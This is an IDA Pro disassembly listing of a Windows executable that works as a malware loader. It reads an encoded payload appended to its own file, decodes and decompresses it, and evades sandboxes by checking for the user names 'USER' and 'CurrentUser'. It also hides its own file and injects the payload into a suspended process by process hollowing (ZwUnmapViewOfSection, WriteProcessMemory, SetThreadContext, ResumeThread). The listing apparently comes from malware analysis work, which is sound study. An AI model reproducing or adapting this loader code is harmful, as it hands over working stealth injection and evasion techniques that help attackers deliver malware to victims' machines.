;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 09ED4D4717164FC830465A5F0627567E
; File Name : u:\work\09ed4d4717164fc830465a5f0627567e_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00004FBD ( 20413.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_40171B+A7�p
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push edi
mov edi, [ebp+arg_4]
imul edi, 64h
push edi ; Size
call _malloc
test eax, eax
pop ecx
mov [ebp+var_8], eax
jz short loc_401085
push ebx
push offset LibFileName ; "ntdll.dll"
call ds:LoadLibraryA ; LoadLibraryA
mov ebx, eax
test ebx, ebx
jz short loc_401082
push esi
mov esi, ds:GetProcAddress
push offset ProcName ; "RtlDecompressBuffer"
push ebx ; hModule
call esi ; GetProcAddress
push offset aRtlgetcompress ; "RtlGetCompressionWorkSpaceSize"
push ebx ; hModule
mov [ebp+var_4], eax
call esi ; GetProcAddress
cmp [ebp+arg_4], 0
pop esi
jz short loc_401082
cmp [ebp+var_4], 0
jz short loc_401082
test eax, eax
jz short loc_401082
lea ecx, [ebp+var_C]
push ecx
lea ecx, [ebp+var_10]
push ecx
push 2
call eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push edi
push [ebp+var_8]
push 2
call [ebp+var_4]
push ebx ; hLibModule
call ds:FreeLibrary ; FreeLibrary
mov eax, [ebp+var_8]
jmp short loc_401084
; ---------------------------------------------------------------------------
loc_401082: ; CODE XREF: sub_401000+2B�j
; sub_401000+4C�j ...
xor eax, eax
loc_401084: ; CODE XREF: sub_401000+80�j
pop ebx
loc_401085: ; CODE XREF: sub_401000+19�j
pop edi
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_401088 proc near ; CODE XREF: sub_4010AD+5B�p
; sub_4010AD+B6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor eax, eax
cmp [esp+arg_4], eax
jle short locret_4010AC
mov ecx, [esp+arg_0]
mov edx, dword_4082C4
add ecx, edx
loc_40109C: ; CODE XREF: sub_401088+22�j
mov dl, [ecx+eax]
mov byte_4082E8[eax], dl
inc eax
cmp eax, [esp+arg_4]
jl short loc_40109C
locret_4010AC: ; CODE XREF: sub_401088+6�j
retn
sub_401088 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010AD proc near ; CODE XREF: WinMain(x,x,x,x)+70�p
var_13C = byte ptr -13Ch
Dst = word ptr -5Ch
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_16 = word ptr -16h
var_8 = word ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 13Ch
mov eax, dword_408040
mov ecx, dword_4082C4
push ebx
push esi
lea esi, [ecx+eax]
mov bl, [esi]
mov byte_4082CC, bl
mov cl, [esi+1]
push edi
mov edi, nNumberOfBytesToRead
mov byte_4082E0, cl
mov cl, [esi+2]
neg byte_4082E0
sub edi, eax
neg bl
neg cl
cmp edi, 40h
mov byte_4082CC, bl
mov byte_4082C0, cl
jb loc_4011AB
add eax, 3
push 40h
push eax
call sub_401088
pop ecx
pop ecx
mov byte_408328, 0
xor esi, esi
loc_401118: ; CODE XREF: sub_4010AD+81�j
mov cl, byte_4082E0
lea eax, dword_4082E9[esi]
add [eax-1], bl
add [eax], cl
inc esi
inc esi
cmp esi, 40h
jb short loc_401118
push 40h ; Size
mov ebx, offset byte_4082E8
lea eax, [ebp+Dst]
push ebx ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
cmp [ebp+Dst], 5A4Dh
jnz short loc_4011AB
mov eax, [ebp+var_20]
lea ecx, [eax+18h]
cmp edi, ecx
jb short loc_4011AB
mov ecx, dword_408040
lea eax, [ecx+eax+3]
push 18h
push eax
call sub_401088
pop ecx
pop ecx
mov byte_408300, 0
xor esi, esi
loc_401173: ; CODE XREF: sub_4010AD+E2�j
mov cl, byte_4082CC
lea eax, dword_4082E9[esi]
add [eax-1], cl
mov cl, byte_4082E0
add [eax], cl
inc esi
inc esi
cmp esi, 18h
jb short loc_401173
push 18h ; Size
lea eax, [ebp+var_1C]
push ebx ; Src
push eax ; Dst
call _memcpy
mov esi, 0E0h
add esp, 0Ch
cmp [ebp+var_8], si
jz short loc_4011B2
loc_4011AB: ; CODE XREF: sub_4010AD+4F�j
; sub_4010AD+9D�j ...
xor al, al
jmp loc_401298
; ---------------------------------------------------------------------------
loc_4011B2: ; CODE XREF: sub_4010AD+FC�j
mov ecx, dword_408040
mov eax, [ebp+var_20]
lea eax, [ecx+eax+1Bh]
push esi
push eax
call sub_401088
pop ecx
pop ecx
mov byte_4083C8, 0
xor edi, edi
loc_4011D1: ; CODE XREF: sub_4010AD+13F�j
mov cl, byte_4082CC
lea eax, dword_4082E9[edi]
add [eax-1], cl
mov cl, byte_4082E0
add [eax], cl
inc edi
inc edi
cmp edi, esi
jb short loc_4011D1
push esi ; Size
lea eax, [ebp+var_13C]
push ebx ; Src
push eax ; Dst
call _memcpy
movzx eax, [ebp+var_16]
lea eax, [eax+eax*4]
shl eax, 3
push eax ; dwBytes
call ??2@YAPAXI@Z ; operator new(uint)
movzx esi, [ebp+var_16]
mov ecx, dword_408040
mov [ebp+var_4], eax
mov eax, [ebp+var_20]
lea esi, [esi+esi*4]
shl esi, 3
lea eax, [ecx+eax+0FBh]
push esi
push eax
call sub_401088
add esp, 18h
xor ecx, ecx
test esi, esi
mov byte_4082E8[esi], 0
jbe short loc_40125D
loc_401240: ; CODE XREF: sub_4010AD+1AE�j
mov dl, byte_4082CC
lea eax, dword_4082E9[ecx]
add [eax-1], dl
mov dl, byte_4082E0
add [eax], dl
inc ecx
inc ecx
cmp ecx, esi
jb short loc_401240
loc_40125D: ; CODE XREF: sub_4010AD+191�j
push esi ; Size
push ebx ; Src
push [ebp+var_4] ; Dst
call _memcpy
mov edi, [ebp+arg_0]
mov eax, [ebp+arg_C]
add esp, 0Ch
push 10h
pop ecx
push 6
lea esi, [ebp+Dst]
rep movsd
mov edi, [ebp+arg_4]
pop ecx
lea esi, [ebp+var_1C]
rep movsd
mov edi, [ebp+arg_8]
push 38h
pop ecx
lea esi, [ebp+var_13C]
rep movsd
mov ecx, [ebp+var_4]
mov [eax], ecx
mov al, 1
loc_401298: ; CODE XREF: sub_4010AD+100�j
pop edi
pop esi
pop ebx
leave
retn
sub_4010AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40129D proc near ; CODE XREF: WinMain(x,x,x,x)+92�p
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
mov ecx, [eax+3Ch]
push esi
mov esi, [eax+20h]
xor edx, edx
mov eax, ecx
div esi
test edx, edx
jz short loc_4012BA
lea ecx, [eax+1]
imul ecx, esi
loc_4012BA: ; CODE XREF: sub_40129D+15�j
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
test eax, eax
jle short loc_4012F4
push ebx
mov ebx, [ebp+arg_C]
push edi
add ebx, 8
mov [ebp+arg_8], eax
loc_4012D0: ; CODE XREF: sub_40129D+53�j
mov edi, [ebx]
test edi, edi
jz short loc_4012EA
xor edx, edx
mov eax, edi
div esi
test edx, edx
jnz short loc_4012E4
add ecx, edi
jmp short loc_4012EA
; ---------------------------------------------------------------------------
loc_4012E4: ; CODE XREF: sub_40129D+41�j
inc eax
imul eax, esi
add ecx, eax
loc_4012EA: ; CODE XREF: sub_40129D+37�j
; sub_40129D+45�j
add ebx, 28h
dec [ebp+arg_8]
jnz short loc_4012D0
pop edi
pop ebx
loc_4012F4: ; CODE XREF: sub_40129D+26�j
mov eax, ecx
pop esi
pop ebp
retn
sub_40129D endp
; =============== S U B R O U T I N E =======================================
sub_4012F9 proc near ; CODE XREF: sub_401313+A9�p
; sub_401313+12D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor edx, edx
div [esp+arg_4]
test edx, edx
jnz short loc_40130C
mov eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_40130C: ; CODE XREF: sub_4012F9+C�j
inc eax
imul eax, [esp+arg_4]
retn
sub_4012F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401313(int,int,size_t Size,int,void *Dst)
sub_401313 proc near ; CODE XREF: WinMain(x,x,x,x)+D4�p
arg_4 = dword ptr 0Ch
Size = dword ptr 10h
arg_C = dword ptr 14h
Dst = dword ptr 18h
push ebp
mov ebp, esp
mov eax, dword_4082C4
push ebx
push esi
mov esi, dword_408040
add eax, esi
mov bl, [eax]
mov byte_4082CC, bl
mov cl, [eax+1]
mov byte_4082E0, cl
mov al, [eax+2]
neg byte_4082E0
neg al
mov byte_4082C0, al
mov eax, [ebp+Size]
neg bl
mov byte_4082CC, bl
push edi
mov edi, [eax+3Ch]
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
test eax, eax
jle short loc_401374
mov ecx, [ebp+arg_C]
add ecx, 14h
loc_401366: ; CODE XREF: sub_401313+5F�j
mov edx, [ecx]
cmp edx, edi
jnb short loc_40136E
mov edi, edx
loc_40136E: ; CODE XREF: sub_401313+57�j
add ecx, 28h
dec eax
jnz short loc_401366
loc_401374: ; CODE XREF: sub_401313+4B�j
push edi
add esi, 3
push esi
call sub_401088
pop ecx
xor esi, esi
test edi, edi
pop ecx
mov byte_4082E8[edi], 0
jbe short loc_4013A4
loc_40138D: ; CODE XREF: sub_401313+8F�j
mov cl, byte_4082E0
lea eax, dword_4082E9[esi]
add [eax-1], bl
add [eax], cl
inc esi
inc esi
cmp esi, edi
jb short loc_40138D
loc_4013A4: ; CODE XREF: sub_401313+78�j
push edi ; Size
push offset byte_4082E8 ; Src
push [ebp+Dst] ; Dst
call _memcpy
mov ebx, [ebp+Size]
mov ecx, [ebx+20h]
push ecx
push dword ptr [ebx+3Ch]
call sub_4012F9
mov edi, eax
add edi, [ebp+Dst]
mov eax, [ebp+arg_4]
and [ebp+Dst], 0
add esp, 14h
cmp word ptr [eax+6], 0
jbe loc_401472
mov esi, [ebp+arg_C]
add esi, 8
loc_4013E1: ; CODE XREF: sub_401313+159�j
mov eax, [esi+8]
test eax, eax
jbe short loc_40144A
mov [ebp+Size], eax
mov eax, [esi]
cmp [ebp+Size], eax
jbe short loc_4013F5
mov [ebp+Size], eax
loc_4013F5: ; CODE XREF: sub_401313+DD�j
mov eax, [esi+0Ch]
mov ecx, dword_408040
push [ebp+Size]
lea eax, [eax+ecx+3]
push eax
call sub_401088
mov eax, [ebp+Size]
pop ecx
pop ecx
xor ecx, ecx
test eax, eax
mov byte_4082E8[eax], 0
jbe short loc_40142E
loc_40141D: ; CODE XREF: sub_401313+119�j
mov dl, byte_4082C0
add byte_4082E8[ecx], dl
inc ecx
cmp ecx, eax
jb short loc_40141D
loc_40142E: ; CODE XREF: sub_401313+108�j
push eax ; Size
push offset byte_4082E8 ; Src
push edi ; Dst
call _memcpy
mov ecx, [ebx+20h]
push ecx
push dword ptr [esi]
call sub_4012F9
add esp, 14h
jmp short loc_40145A
; ---------------------------------------------------------------------------
loc_40144A: ; CODE XREF: sub_401313+D3�j
mov eax, [esi]
test eax, eax
jz short loc_40145C
push ecx
push eax
call sub_4012F9
add esp, 8
loc_40145A: ; CODE XREF: sub_401313+135�j
add edi, eax
loc_40145C: ; CODE XREF: sub_401313+13B�j
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
inc [ebp+Dst]
add esi, 28h
cmp [ebp+Dst], eax
jl loc_4013E1
loc_401472: ; CODE XREF: sub_401313+C2�j
pop edi
pop esi
mov al, 1
pop ebx
pop ebp
retn
sub_401313 endp
; =============== S U B R O U T I N E =======================================
sub_401479 proc near ; CODE XREF: sub_4015A2+BB�p
arg_8 = dword ptr 0Ch
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov eax, [esp+arg_8]
mov ecx, [eax+88h]
test ecx, ecx
jz short locret_4014E7
cmp dword ptr [eax+8Ch], 0
jz short locret_4014E7
mov edx, [esp+arg_10]
push esi
mov esi, [esp+4+arg_14]
sub esi, [eax+1Ch]
add ecx, edx
cmp dword ptr [ecx+4], 0
jz short loc_4014E6
push ebx
push edi
loc_4014A6: ; CODE XREF: sub_401479+69�j
mov eax, [ecx+4]
sub eax, 8
shr eax, 1
test eax, eax
lea edi, [ecx+8]
jle short loc_4014DC
mov ebx, eax
loc_4014B7: ; CODE XREF: sub_401479+61�j
xor edx, edx
mov dx, [edi]
mov eax, edx
and eax, 0FFFh
add eax, [ecx]
and dx, 0F000h
add eax, [esp+0Ch+arg_10]
cmp dx, 3000h
jnz short loc_4014D7
add [eax], esi
loc_4014D7: ; CODE XREF: sub_401479+5A�j
inc edi
inc edi
dec ebx
jnz short loc_4014B7
loc_4014DC: ; CODE XREF: sub_401479+3A�j
cmp dword ptr [edi+4], 0
mov ecx, edi
jnz short loc_4014A6
pop edi
pop ebx
loc_4014E6: ; CODE XREF: sub_401479+29�j
pop esi
locret_4014E7: ; CODE XREF: sub_401479+C�j
; sub_401479+15�j
retn
sub_401479 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4014E8(LPSTR lpCommandLine,LPPROCESS_INFORMATION lpProcessInformation,LPCONTEXT lpContext,LPVOID lpBuffer)
sub_4014E8 proc near ; CODE XREF: WinMain(x,x,x,x)+EF�p
StartupInfo = _STARTUPINFOA ptr -64h
Buffer = _MEMORY_BASIC_INFORMATION ptr -20h
NumberOfBytesRead= dword ptr -4
lpCommandLine = dword ptr 8
lpProcessInformation= dword ptr 0Ch
lpContext = dword ptr 10h
lpBuffer = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 64h
push esi
mov esi, [ebp+lpProcessInformation]
push edi
push 10h
pop ecx
xor edx, edx
push esi ; lpProcessInformation
xor eax, eax
mov [ebp+StartupInfo.cb], edx
lea edi, [ebp+StartupInfo.lpReserved]
rep stosd
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
push edx ; lpCurrentDirectory
push edx ; lpEnvironment
push 4 ; dwCreationFlags
push edx ; bInheritHandles
push edx ; lpThreadAttributes
push edx ; lpProcessAttributes
push [ebp+lpCommandLine] ; lpCommandLine
push edx ; lpApplicationName
call ds:CreateProcessA ; CreateProcessA
test eax, eax
jz short loc_40157F
mov edi, [ebp+lpContext]
push ebx
push edi ; lpContext
mov dword ptr [edi], 10007h
push dword ptr [esi+4] ; hThread
call ds:GetThreadContext ; GetThreadContext
mov ebx, [ebp+lpBuffer]
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
mov eax, [edi+0A4h]
push 4 ; nSize
push ebx ; lpBuffer
add eax, 8
push eax ; lpBaseAddress
push dword ptr [esi] ; hProcess
call ds:ReadProcessMemory ; ReadProcessMemory
mov edi, [ebx]
mov ebx, ds:VirtualQueryEx
jmp short loc_401562
; ---------------------------------------------------------------------------
loc_401556: ; CODE XREF: sub_4014E8+87�j
cmp [ebp+Buffer.State], 10000h
jz short loc_401571
add edi, [ebp+Buffer.RegionSize]
loc_401562: ; CODE XREF: sub_4014E8+6C�j
push 1Ch ; dwLength
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push edi ; lpAddress
push dword ptr [esi] ; hProcess
call ebx ; VirtualQueryEx
test eax, eax
jnz short loc_401556
loc_401571: ; CODE XREF: sub_4014E8+75�j
mov eax, [ebp+lpBuffer]
sub edi, [eax]
pop ebx
mov [eax+4], edi
xor eax, eax
inc eax
jmp short loc_401581
; ---------------------------------------------------------------------------
loc_40157F: ; CODE XREF: sub_4014E8+32�j
xor eax, eax
loc_401581: ; CODE XREF: sub_4014E8+95�j
pop edi
pop esi
leave
retn
sub_4014E8 endp
; =============== S U B R O U T I N E =======================================
sub_401585 proc near ; CODE XREF: sub_4015A2+83�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp dword ptr [eax+88h], 0
jz short loc_40159F
cmp dword ptr [eax+8Ch], 0
jz short loc_40159F
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_40159F: ; CODE XREF: sub_401585+B�j
; sub_401585+14�j
xor eax, eax
retn
sub_401585 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4015A2(int,int,DWORD flOldProtect,int,int,int,int,HANDLE hProcess,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,LPVOID lpAddress,SIZE_T dwSize)
sub_4015A2 proc near ; CODE XREF: WinMain(x,x,x,x)+13B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
flOldProtect = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
hProcess = dword ptr 24h
arg_20 = dword ptr 28h
arg_2C = dword ptr 34h
arg_D0 = dword ptr 0D8h
arg_DC = dword ptr 0E4h
lpAddress = dword ptr 300h
dwSize = dword ptr 304h
push ebp
mov ebp, esp
mov eax, [ebp+lpAddress]
push ebx
mov ebx, [ebp+flOldProtect]
cmp [ebx+1Ch], eax
push esi
mov esi, ds:VirtualAllocEx
push edi
mov edi, 3000h
jnz short loc_4015E4
mov ecx, [ebp+dwSize]
cmp [ebp+arg_14], ecx
ja short loc_4015E4
lea edx, [ebp+flOldProtect]
push edx ; lpflOldProtect
push 40h ; flNewProtect
push ecx ; dwSize
push eax ; lpAddress
push [ebp+hProcess] ; hProcess
mov dword_43E520, eax
call ds:VirtualProtectEx ; VirtualProtectEx
jmp short loc_40161B
; ---------------------------------------------------------------------------
loc_4015E4: ; CODE XREF: sub_4015A2+1D�j
; sub_4015A2+28�j
mov ecx, [ebp+hProcess]
push eax
push ecx
mov dword_4082DC, ecx
mov dword_43E510, eax
call dword_43E528 ; ZwUnmapViewOfSection
test eax, eax
jnz short loc_401602
mov byte ptr [ebp+flOldProtect+3], 1
loc_401602: ; CODE XREF: sub_4015A2+5A�j
cmp byte ptr [ebp+flOldProtect+3], 1
jnz short loc_40161B
push 40h ; flProtect
push edi ; flAllocationType
push [ebp+arg_14] ; dwSize
push dword ptr [ebx+1Ch] ; lpAddress
push [ebp+hProcess] ; hProcess
call esi ; VirtualAllocEx
mov dword_43E520, eax
loc_40161B: ; CODE XREF: sub_4015A2+40�j
; sub_4015A2+64�j
cmp dword_43E520, 0
jnz short loc_401672
push ebx
call sub_401585
add esp, 4
test eax, eax
jz loc_401700
push 40h ; flProtect
push edi ; flAllocationType
push [ebp+arg_14] ; dwSize
push 0 ; lpAddress
push [ebp+hProcess] ; hProcess
call esi ; VirtualAllocEx
test eax, eax
mov dword_43E520, eax
jz loc_401700
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call sub_401479
add esp, 18h
cmp dword_43E520, 0
jz loc_401700
loc_401672: ; CODE XREF: sub_4015A2+80�j
mov esi, [ebp+arg_D0]
push offset aWriteprocessme ; "WriteProcessMemory"
push offset ModuleName ; "kernel32.dll"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
push 0
push 4
push offset dword_43E520
add esi, 8
push esi
mov esi, [ebp+hProcess]
push esi
call eax
mov eax, [ebp+arg_0]
mov eax, [eax+3Ch]
mov ecx, dword_43E520
mov edx, [ebp+arg_10]
mov [eax+edx+34h], ecx
mov eax, dword_43E520
cmp eax, [ebp+lpAddress]
mov [ebp+arg_2C], 10007h
jnz short loc_4016D7
mov eax, [ebx+10h]
add eax, [ebx+1Ch]
mov [ebp+arg_DC], eax
jmp short loc_4016E2
; ---------------------------------------------------------------------------
loc_4016D7: ; CODE XREF: sub_4015A2+125�j
mov ecx, [ebx+10h]
add ecx, eax
mov [ebp+arg_DC], ecx
loc_4016E2: ; CODE XREF: sub_4015A2+133�j
mov eax, [ebp+arg_20]
lea ecx, [ebp+arg_2C]
push ecx
push eax
mov dword_43E514, esi
mov hThread, eax
call dword_43E52C ; SetThreadContext
xor eax, eax
inc eax
jmp short loc_401702
; ---------------------------------------------------------------------------
loc_401700: ; CODE XREF: sub_4015A2+8D�j
; sub_4015A2+A7�j ...
xor eax, eax
loc_401702: ; CODE XREF: sub_4015A2+15C�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4015A2 endp
; =============== S U B R O U T I N E =======================================
sub_401707 proc near ; CODE XREF: WinMain(x,x,x,x)+168�p
push hThread ; hThread
mov byte_43E518, 1
call ds:ResumeThread ; ResumeThread
retn
sub_401707 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40171B(LPCSTR lpFileName)
sub_40171B proc near ; CODE XREF: WinMain(x,x,x,x)+28�p
NumberOfBytesRead= dword ptr -4
lpFileName = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
xor ebx, ebx
push ebx ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
call ds:CreateFileA ; CreateFileA
push ebx ; lpFileSizeHigh
push eax ; hFile
mov hFile, eax
call ds:GetFileSize ; GetFileSize
mov nNumberOfBytesToRead, eax
inc eax
push eax ; Size
call _malloc
pop ecx
push ebx ; lpOverlapped
lea ecx, [ebp+NumberOfBytesRead]
push ecx ; lpNumberOfBytesRead
push nNumberOfBytesToRead ; nNumberOfBytesToRead
mov dword_4082C4, eax
push eax ; lpBuffer
push hFile ; hFile
call ds:ReadFile ; ReadFile
mov eax, [ebp+NumberOfBytesRead]
sub eax, dword_408040
inc eax
push eax ; Size
call _malloc
mov esi, [ebp+NumberOfBytesRead]
pop ecx
mov ecx, dword_408040
mov edi, esi
xor edx, edx
sub edi, ecx
jz short loc_4017BA
loc_401796: ; CODE XREF: sub_40171B+9D�j
mov esi, dword_4082C4
add ecx, esi
mov cl, [ecx+edx]
mov [eax+edx], cl
mov [eax+edx+1], bl
mov esi, [ebp+NumberOfBytesRead]
mov ecx, dword_408040
mov edi, esi
inc edx
sub edi, ecx
cmp edx, edi
jb short loc_401796
loc_4017BA: ; CODE XREF: sub_40171B+79�j
lea edx, [ebp+NumberOfBytesRead]
push edx
sub esi, ecx
push esi
push eax
call sub_401000
add esp, 0Ch
pop edi
pop esi
mov dword_408040, ebx
mov dword_4082C4, eax
pop ebx
leave
retn
sub_40171B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017DA proc near ; CODE XREF: WinMain(x,x,x,x)+2E�p
String2 = byte ptr -68h
pcbBuffer = dword ptr -4
push ebp
mov ebp, esp
sub esp, 68h
push esi
push 64h
pop esi
push esi ; Size
lea eax, [ebp+String2]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+pcbBuffer]
push eax ; pcbBuffer
lea eax, [ebp+String2]
push eax ; lpBuffer
mov [ebp+pcbBuffer], esi
call ds:GetUserNameA ; GetUserNameA
test eax, eax
jz short loc_401830
mov esi, ds:lstrcmpA
lea eax, [ebp+String2]
push eax ; lpString2
push offset String1 ; "USER"
call esi ; lstrcmpA
test eax, eax
jz short loc_40182C
lea eax, [ebp+String2]
push eax ; lpString2
push offset aCurrentuser ; "CurrentUser"
call esi ; lstrcmpA
test eax, eax
jnz short loc_401830
loc_40182C: ; CODE XREF: sub_4017DA+41�j
mov al, 1
jmp short loc_401832
; ---------------------------------------------------------------------------
loc_401830: ; CODE XREF: sub_4017DA+2C�j
; sub_4017DA+50�j
xor al, al
loc_401832: ; CODE XREF: sub_4017DA+54�j
pop esi
leave
retn
sub_4017DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+186�p
Context = CONTEXT ptr -524h
flOldProtect = dword ptr -258h
FileName = byte ptr -178h
var_78 = dword ptr -78h
ProcessInformation= _PROCESS_INFORMATION ptr -38h
var_28 = dword ptr -28h
Buffer = dword ptr -10h
dwSize = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
hInstance = dword ptr 8
hPrevInstance = dword ptr 0Ch
lpCmdLine = dword ptr 10h
nShowCmd = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 524h
push ebx
push esi
push edi
push 100h ; nSize
lea eax, [ebp+FileName]
push eax ; lpFilename
xor esi, esi
push esi ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
lea eax, [ebp+FileName]
push eax ; lpFileName
call sub_40171B
pop ecx
call sub_4017DA
test al, al
jz short loc_401883
push esi ; uType
push offset Caption ; ".%%%^###########%^#^"
push offset Text ; "."
push esi ; hWnd
call ds:MessageBoxA ; MessageBoxA
jmp loc_4019A2
; ---------------------------------------------------------------------------
loc_401883: ; CODE XREF: WinMain(x,x,x,x)+35�j
push 6 ; dwFileAttributes
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:SetFileAttributesA ; SetFileAttributesA
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+flOldProtect]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_78]
push eax
call sub_4010AD
add esp, 10h
test al, al
jz loc_4019A2
push [ebp+var_4]
lea eax, [ebp+flOldProtect]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_78]
push eax
call sub_40129D
add esp, 10h
push offset aVirtualalloc ; "VirtualAlloc"
push offset ModuleName ; "kernel32.dll"
mov ebx, eax
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
push 40h
push 1000h
push ebx
push esi
call eax
push eax ; Dst
push [ebp+var_4] ; int
mov [ebp+var_8], eax
lea eax, [ebp+flOldProtect]
push eax ; Size
lea eax, [ebp+var_28]
push eax ; int
lea eax, [ebp+var_78]
push eax ; int
call sub_401313
lea eax, [ebp+Buffer]
push eax ; lpBuffer
lea eax, [ebp+Context]
push eax ; lpContext
lea eax, [ebp+ProcessInformation]
push eax ; lpProcessInformation
lea eax, [ebp+FileName]
push eax ; lpCommandLine
call sub_4014E8
add esp, 24h
push [ebp+dwSize] ; dwSize
mov ecx, 0B3h
push [ebp+Buffer] ; lpAddress
lea esi, [ebp+Context]
sub esp, 2CCh
mov edi, esp
sub esp, 10h
rep movsd
mov edi, esp
lea eax, [ebp+FileName]
push eax ; int
push ebx ; int
push [ebp+var_8] ; int
lea esi, [ebp+ProcessInformation]
push [ebp+var_4] ; int
movsd
movsd
lea eax, [ebp+flOldProtect]
push eax ; flOldProtect
lea eax, [ebp+var_28]
movsd
push eax ; int
lea eax, [ebp+var_78]
push eax ; int
movsd
call sub_4015A2
add esp, 300h
push 0
push ebx
push [ebp+var_8]
push dword_43E520
push dword_43E514
call dword_43E524 ; WriteProcessMemory
test eax, eax
setnz al
mov byte_43E518, al
call sub_401707
loc_4019A2: ; CODE XREF: WinMain(x,x,x,x)+49�j
; WinMain(x,x,x,x)+7A�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
_WinMain@16 endp
; [00000046 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND]
align 10h
